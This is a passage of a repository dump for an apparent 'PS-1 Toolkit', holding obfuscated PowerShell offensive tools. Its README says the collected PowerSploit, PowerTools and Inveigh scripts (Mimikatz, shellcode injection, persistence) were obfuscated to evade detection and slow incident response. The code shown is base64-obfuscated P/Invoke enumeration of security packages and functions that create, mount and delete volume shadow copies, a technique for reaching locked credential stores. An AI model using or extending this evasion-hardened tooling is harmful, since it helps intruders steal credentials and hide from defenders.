${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBPAE4ATgBFAEMAVABJAE8ATgA='))), 0x10) 590 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBVAEwAVABJAF8AUgBFAFEAVQBJAFIARQBEAA=='))), 0x20) 591 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBMAEkARQBOAFQAXwBPAE4ATABZAA=='))), 0x40) 592 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAFQARQBOAEQARQBEAF8ARQBSAFIATwBSAA=='))), 0x80) 593 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAFAARQBSAFMATwBOAEEAVABJAE8ATgA='))), 0x100) 594 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBDAEMARQBQAFQAXwBXAEkATgAzADIAXwBOAEEATQBFAA=='))), 0x200) 595 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBUAFIARQBBAE0A'))), 0x400) 596 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBFAEcATwBUAEkAQQBCAEwARQA='))), 0x800) 597 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBTAFMAXwBDAE8ATQBQAEEAVABJAEIATABFAA=='))), 0x1000) 598 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABPAEcATwBOAA=='))), 0x2000) 599 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBTAEMASQBJAF8AQgBVAEYARgBFAFIAUwA='))), 0x4000) 600 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBSAEEARwBNAEUATgBUAA=='))), 0x8000) 601 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBVAFQAVQBBAEwAXwBBAFUAVABIAA=='))), 0x10000) 602 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABFAEwARQBHAEEAVABJAE8ATgA='))), 0x20000) 603 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAEEARABPAE4ATABZAF8AVwBJAFQASABfAEMASABFAEMASwBTAFUATQA='))), 0x40000) 604 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAVABSAEkAQwBUAEUARABfAFQATwBLAEUATgBTAA=='))), 0x80000) 605 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBFAEcATwBfAEUAWABUAEUATgBEAEUAUgA='))), 0x100000) 606 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBFAEcATwBUAEkAQQBCAEwARQAyAA=='))), 0x200000) 607 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBQAFAAQwBPAE4AVABBAEkATgBFAFIAXwBQAEEAUwBTAFQASABSAE8AVQBHAEgA'))), 0x400000) 608 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBQAFAAQwBPAE4AVABBAEkATgBFAFIAXwBDAEgARQBDAEsAUwA='))), 0x800000) 609 | ${845747684be04a1c8f756bf8fe82d800} = ${d09bb55ff972413ead29f35f8a7f48b0}.CreateType() 610 | ${45b97198ae354124831731ef24c92007} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAuAFMAZQBjAFAAawBnAEkAbgBmAG8A'))), ${2a6b61d5404b4a36899cdae620046f62}, [Object], [Reflection.Emit.PackingSize]::Size8) 611 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZgBDAGEAcABhAGIAaQBsAGkAdABpAGUAcwA='))), ${845747684be04a1c8f756bf8fe82d800}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 612 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwBWAGUAcgBzAGkAbwBuAA=='))), [Int16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 613 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwBSAFAAQwBJAEQA'))), [Int16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 614 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwBiAE0AYQB4AFQAbwBrAGUAbgA='))), [Int32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 615 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 616 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG0AbQBlAG4AdAA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 617 | ${51c48e6f503547d5a1af31028b97d2a5} = ${45b97198ae354124831731ef24c92007}.CreateType() 618 | ${45b97198ae354124831731ef24c92007} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAuAFMAZQBjAHUAcgAzADIA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 619 | ${3a0d90aa783842659ba2918c88428ef3} = ${45b97198ae354124831731ef24c92007}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBuAHUAbQBlAHIAYQB0AGUAUwBlAGMAdQByAGkAdAB5AFAAYQBjAGsAYQBnAGUAcwA='))), 620 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGMAdQByADMAMgAuAGQAbABsAA=='))), 621 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 622 | [Reflection.CallingConventions]::Standard, 623 | [Int32], 624 | [Type[]] @([Int32].MakeByRefType(), 625 | [IntPtr].MakeByRefType()), 626 | [Runtime.InteropServices.CallingConvention]::Winapi, 627 | [Runtime.InteropServices.CharSet]::Ansi) 628 | ${036a3cc75ce04b6e8c8f0f3f43bb1521} = ${45b97198ae354124831731ef24c92007}.CreateType() 629 | ${2136db02e44f4de8a5c7f94b1c3e1b30} = 0 630 | ${8d0c3967fbd946f4922a42c273f3fcb8} = [IntPtr]::Zero 631 | ${8d8d49797b5b494095bad3098d94ec73} = ${036a3cc75ce04b6e8c8f0f3f43bb1521}::EnumerateSecurityPackages([Ref] ${2136db02e44f4de8a5c7f94b1c3e1b30}, [Ref] ${8d0c3967fbd946f4922a42c273f3fcb8}) 632 | if (${8d8d49797b5b494095bad3098d94ec73} -ne 0) 633 | { 634 | throw "Unable to enumerate seucrity packages. Error (0x$(${8d8d49797b5b494095bad3098d94ec73}.ToString('X8')))" 635 | } 636 | if (${2136db02e44f4de8a5c7f94b1c3e1b30} -eq 0) 637 | { 638 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABoAGUAcgBlACAAYQByAGUAIABuAG8AIABpAG4AcwB0AGEAbABsAGUAZAAgAHMAZQBjAHUAcgBpAHQAeQAgAHAAYQBjAGsAYQBnAGUAcwAuAA=='))) 639 | return 640 | } 641 | ${4d58aec7546049d28371ff982f0e2c58} = ${8d0c3967fbd946f4922a42c273f3fcb8} 642 | foreach ($i in 1..${2136db02e44f4de8a5c7f94b1c3e1b30}) 643 | { 644 | ${9e676a9cf4a647668f2fc350c23da73c} = [Runtime.InteropServices.Marshal]::PtrToStructure(${4d58aec7546049d28371ff982f0e2c58}, [Type] ${51c48e6f503547d5a1af31028b97d2a5}) 645 | ${4d58aec7546049d28371ff982f0e2c58} = [IntPtr] (${4d58aec7546049d28371ff982f0e2c58}.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] ${51c48e6f503547d5a1af31028b97d2a5})) 646 | ${fbef978007bd41f7b91c557d1c93d266} = $null 647 | if (${9e676a9cf4a647668f2fc350c23da73c}.Name -ne [IntPtr]::Zero) 648 | { 649 | ${fbef978007bd41f7b91c557d1c93d266} = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(${9e676a9cf4a647668f2fc350c23da73c}.Name) 650 | } 651 | ${11587f86c7d64252820518c462df8ed0} = $null 652 | if (${9e676a9cf4a647668f2fc350c23da73c}.Comment -ne [IntPtr]::Zero) 653 | { 654 | ${11587f86c7d64252820518c462df8ed0} = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(${9e676a9cf4a647668f2fc350c23da73c}.Comment) 655 | } 656 | ${c0c8f88f6219441b8f0353b4b6743577} = @{ 657 | Name = ${fbef978007bd41f7b91c557d1c93d266} 658 | Comment = ${11587f86c7d64252820518c462df8ed0} 659 | Capabilities = ${9e676a9cf4a647668f2fc350c23da73c}.fCapabilities 660 | MaxTokenSize = ${9e676a9cf4a647668f2fc350c23da73c}.cbMaxToken 661 | } 662 | ${ab7e17eb066b4e0cb4ce12583adc5c8b} = New-Object PSObject -Property ${c0c8f88f6219441b8f0353b4b6743577} 663 | ${ab7e17eb066b4e0cb4ce12583adc5c8b}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEMAVQBSADMAMgAuAFMARQBDAFAASwBHAEkATgBGAE8A'))) 664 | ${ab7e17eb066b4e0cb4ce12583adc5c8b} 665 | } 666 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | PS-1 Toolkit 2 | ============ 3 | 4 | This is a set of PowerShell scripts that are used by many penetration testers released by multiple leading professionals. This is simply a collection of scripts that are prepared and obfuscated to reduce level of detectability and to slow down incident response from understanding the actions performed by an attacker. 5 | 6 | I did not write any of these, I merely performed the obfuscation process on them. Refer to the respective repositories for updates, credit and documentation on usage. 7 | 8 | As we often hear the term "defense in depth" quite often, this could be thought of as "hide in depth" from an attackers perspective. It may not be quiet, but each step we add into the process to make it more difficult for IR, the better. It allows us to add sophistication to really test cyber defenses for organizations to help then improve. 9 | 10 | Obfuscator: http://www.powertheshell.com/isesteroids2-2/ordering-isesteroids/ 11 | 12 | PowerSploit 13 | =========== 14 | https://github.com/PowerShellMafia/PowerSploit/
15 | 16 | Get-VaultCredential
17 | Invoke-GPPPassword
18 | Invoke-Mimikatz
19 | Invoke-NinjaCopy
20 | Invoke-ReflectivePEInjection
21 | Invoke-Shellcode
22 | Invoke-WmiCommand
23 | Persistence
24 | VolumeShadowCopyTools
25 | 26 | PowerTools 27 | ========== 28 | https://github.com/Veil-Framework/PowerTools 29 | 30 | PowerUp
31 | PowerView
32 | 33 | Inveigh 34 | ======= 35 | https://github.com/Kevin-Robertson/Inveigh 36 | 37 | Inveigh
38 | Inveigh-Relay
39 | Inveigh-BruteForce
40 | -------------------------------------------------------------------------------- /VolumeShadowCopyTools.ps1: -------------------------------------------------------------------------------- 1 | function Get-VolumeShadowCopy 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Lists the device paths of all local volume shadow copies. 7 | 8 | PowerSploit Function: Get-VolumeShadowCopy 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | #> 14 | ${83f9ee88d8954f24b68d6b55e6939fcf} = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) 15 | if (-not ${83f9ee88d8954f24b68d6b55e6939fcf}.IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 16 | { 17 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIABHAGUAdAAtAFYAbwBsAHUAbQBlAFMAaABhAGQAbwB3AEMAbwBwAHkAIABmAHIAbwBtACAAYQBuACAAZQBsAGUAdgBhAHQAZQBkACAAYwBvAG0AbQBhAG4AZAAgAHAAcgBvAG0AcAB0AC4A'))) 18 | } 19 | gwmi -Namespace root\cimv2 -Class Win32_ShadowCopy | % { $_.DeviceObject } 20 | } 21 | function New-VolumeShadowCopy 22 | { 23 | Param( 24 | [Parameter(Mandatory = $True)] 25 | [ValidatePattern('^\w:\\')] 26 | [String] 27 | ${e89ed31dbd63491c838e0d48707f3a3d}, 28 | [Parameter(Mandatory = $False)] 29 | [ValidateSet("ClientAccessible")] 30 | [String] 31 | ${d8e1cf8ac8274a41a641f08c00759624} = "ClientAccessible" 32 | ) 33 | ${83f9ee88d8954f24b68d6b55e6939fcf} = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) 34 | if (-not ${83f9ee88d8954f24b68d6b55e6939fcf}.IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 35 | { 36 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIABHAGUAdAAtAFYAbwBsAHUAbQBlAFMAaABhAGQAbwB3AEMAbwBwAHkAIABmAHIAbwBtACAAYQBuACAAZQBsAGUAdgBhAHQAZQBkACAAYwBvAG0AbQBhAG4AZAAgAHAAcgBvAG0AcAB0AC4A'))) 37 | } 38 | ${4780257d8a374310937b15028877a618} = (gsv -Name VSS).Status 39 | ${feb66c69d4724532bf70a30729489a3e} = [WMICLASS]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAGMAaQBtAHYAMgA6AHcAaQBuADMAMgBfAHMAaABhAGQAbwB3AGMAbwBwAHkA'))) 40 | ${44bb39c517ad4ac38d11950420929a61} = ${feb66c69d4724532bf70a30729489a3e}.create("${e89ed31dbd63491c838e0d48707f3a3d}", "${d8e1cf8ac8274a41a641f08c00759624}") 41 | switch(${44bb39c517ad4ac38d11950420929a61}.returnvalue) 42 | { 43 | 1 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBjAGMAZQBzAHMAIABkAGUAbgBpAGUAZAAuAA=='))); break} 44 | 2 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGEAcgBnAHUAbQBlAG4AdAAuAA=='))); break} 45 | 3 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBwAGUAYwBpAGYAaQBlAGQAIAB2AG8AbAB1AG0AZQAgAG4AbwB0ACAAZgBvAHUAbgBkAC4A'))); break} 46 | 4 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBwAGUAYwBpAGYAaQBlAGQAIAB2AG8AbAB1AG0AZQAgAG4AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQALgA='))); break} 47 | 5 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAHMAdQBwAHAAbwByAHQAZQBkACAAcwBoAGEAZABvAHcAIABjAG8AcAB5ACAAYwBvAG4AdABlAHgAdAAuAA=='))); break} 48 | 6 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdQBmAGYAaQBjAGkAZQBuAHQAIABzAHQAbwByAGEAZwBlAC4A'))); break} 49 | 7 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGwAdQBtAGUAIABpAHMAIABpAG4AIAB1AHMAZQAuAA=='))); break} 50 | 8 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAHgAaQBtAHUAbQAgAG4AdQBtAGIAZQByACAAbwBmACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHIAZQBhAGMAaABlAGQALgA='))); break} 51 | 9 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBuAG8AdABoAGUAcgAgAHMAaABhAGQAbwB3ACAAYwBvAHAAeQAgAG8AcABlAHIAYQB0AGkAbwBuACAAaQBzACAAYQBsAHIAZQBhAGQAeQAgAGkAbgAgAHAAcgBvAGcAcgBlAHMAcwAuAA=='))); break} 52 | 10 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGEAZABvAHcAIABjAG8AcAB5ACAAcAByAG8AdgBpAGQAZQByACAAdgBlAHQAbwBlAGQAIAB0AGgAZQAgAG8AcABlAHIAYQB0AGkAbwBuAC4A'))); break} 53 | 11 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGEAZABvAHcAIABjAG8AcAB5ACAAcAByAG8AdgBpAGQAZQByACAAbgBvAHQAIAByAGUAZwBpAHMAdABlAHIAZQBkAC4A'))); break} 54 | 12 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGEAZABvAHcAIABjAG8AcAB5ACAAcAByAG8AdgBpAGQAZQByACAAZgBhAGkAbAB1AHIAZQAuAA=='))); break} 55 | 13 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGsAbgBvAHcAbgAgAGUAcgByAG8AcgAuAA=='))); break} 56 | default {break} 57 | } 58 | if(${4780257d8a374310937b15028877a618} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AG8AcABwAGUAZAA=')))) 59 | { 60 | spsv -Name VSS 61 | } 62 | } 63 | function Remove-VolumeShadowCopy 64 | { 65 | [CmdletBinding(SupportsShouldProcess = $True)] 66 | Param( 67 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 68 | [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')] 69 | [String] 70 | ${e4e586706d42432db96f566c36be403d} 71 | ) 72 | PROCESS 73 | { 74 | if($PSCmdlet.ShouldProcess("The VolumeShadowCopy at DevicePath ${e4e586706d42432db96f566c36be403d} will be removed")) 75 | { 76 | (gwmi -Namespace root\cimv2 -Class Win32_ShadowCopy | ? {$_.DeviceObject -eq ${e4e586706d42432db96f566c36be403d}}).Delete() 77 | } 78 | } 79 | } 80 | function Mount-VolumeShadowCopy 81 | { 82 | Param ( 83 | [Parameter(Mandatory = $True)] 84 | [ValidateNotNullOrEmpty()] 85 | [String] 86 | ${b226ae46a4884833bfb8db0ef02d3e00}, 87 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 88 | [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')] 89 | [String[]] 90 | ${e4e586706d42432db96f566c36be403d} 91 | ) 92 | BEGIN 93 | { 94 | ${83f9ee88d8954f24b68d6b55e6939fcf} = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) 95 | if (-not ${83f9ee88d8954f24b68d6b55e6939fcf}.IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 96 | { 97 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIABHAGUAdAAtAFYAbwBsAHUAbQBlAFMAaABhAGQAbwB3AEMAbwBwAHkAIABmAHIAbwBtACAAYQBuACAAZQBsAGUAdgBhAHQAZQBkACAAYwBvAG0AbQBhAG4AZAAgAHAAcgBvAG0AcAB0AC4A'))) 98 | } 99 | ls ${b226ae46a4884833bfb8db0ef02d3e00} -ErrorAction Stop | Out-Null 100 | ${b1b1aba9dae94768bdc412a109806796} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBTAFMAVQB0AGkAbAA=')))) 101 | ${29faa606c8f24471920596f3410cf7b8} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${b1b1aba9dae94768bdc412a109806796}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 102 | ${4542515b539e4ed5bde7ff54512d0814} = ${29faa606c8f24471920596f3410cf7b8}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBTAFMAVQB0AGkAbAA='))), $False) 103 | ${a4d92881f6dd44bbbb483c140489d796} = ${4542515b539e4ed5bde7ff54512d0814}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBTAFMALgBLAGUAcgBuAGUAbAAzADIA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 104 | ${b4fd4dbc9c854e8189eb585c4174cc1a} = ${a4d92881f6dd44bbbb483c140489d796}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAYQB0AGUAUwB5AG0AYgBvAGwAaQBjAEwAaQBuAGsA'))), 105 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))), 106 | ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), 107 | [Reflection.CallingConventions]::Standard, 108 | [Bool], 109 | [Type[]]@([String], [String], [UInt32]), 110 | [Runtime.InteropServices.CallingConvention]::Winapi, 111 | [Runtime.InteropServices.CharSet]::Auto) 112 | ${0e80b38d1c474dedaf867d557feda64c} = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) 113 | ${418b7351860040e882ef1847d703ccb4} = [Runtime.InteropServices.DllImportAttribute].GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHQATABhAHMAdABFAHIAcgBvAHIA')))) 114 | ${e3c67543c2ee4082a819b7bf7a3868ba} = New-Object Reflection.Emit.CustomAttributeBuilder(${0e80b38d1c474dedaf867d557feda64c}, 115 | @($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA')))), 116 | [Reflection.FieldInfo[]]@(${418b7351860040e882ef1847d703ccb4}), 117 | @($true)) 118 | ${b4fd4dbc9c854e8189eb585c4174cc1a}.SetCustomAttribute(${e3c67543c2ee4082a819b7bf7a3868ba}) 119 | ${79171bc3525f4b539968569680f9f24e} = ${a4d92881f6dd44bbbb483c140489d796}.CreateType() 120 | } 121 | PROCESS 122 | { 123 | foreach (${e89ed31dbd63491c838e0d48707f3a3d} in ${e4e586706d42432db96f566c36be403d}) 124 | { 125 | ${e89ed31dbd63491c838e0d48707f3a3d} -match $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBcAFwAXABcAFwAPwBcAFwARwBMAE8AQgBBAEwAUgBPAE8AVABcAFwARABlAHYAaQBjAGUAXABcACgAPwA8AEwAaQBuAGsATgBhAG0AZQA+AEgAYQByAGQAZABpAHMAawBWAG8AbAB1AG0AZQBTAGgAYQBkAG8AdwBDAG8AcAB5AFsAMAAtADkAXQB7ADEALAAzAH0AKQAkAA=='))) | Out-Null 126 | ${48dbab63fb76438c97049129a14e2b82} = Join-Path ${b226ae46a4884833bfb8db0ef02d3e00} $Matches.LinkName 127 | if (Test-Path ${48dbab63fb76438c97049129a14e2b82}) 128 | { 129 | Write-Warning "'${48dbab63fb76438c97049129a14e2b82}' already exists." 130 | continue 131 | } 132 | if (-not ${79171bc3525f4b539968569680f9f24e}::CreateSymbolicLink(${48dbab63fb76438c97049129a14e2b82}, "$(${e89ed31dbd63491c838e0d48707f3a3d})\", 1)) 133 | { 134 | Write-Error "Symbolic link creation failed for '${e89ed31dbd63491c838e0d48707f3a3d}'." 135 | continue 136 | } 137 | gi ${48dbab63fb76438c97049129a14e2b82} 138 | } 139 | } 140 | END 141 | { 142 | } 143 | } 144 | --------------------------------------------------------------------------------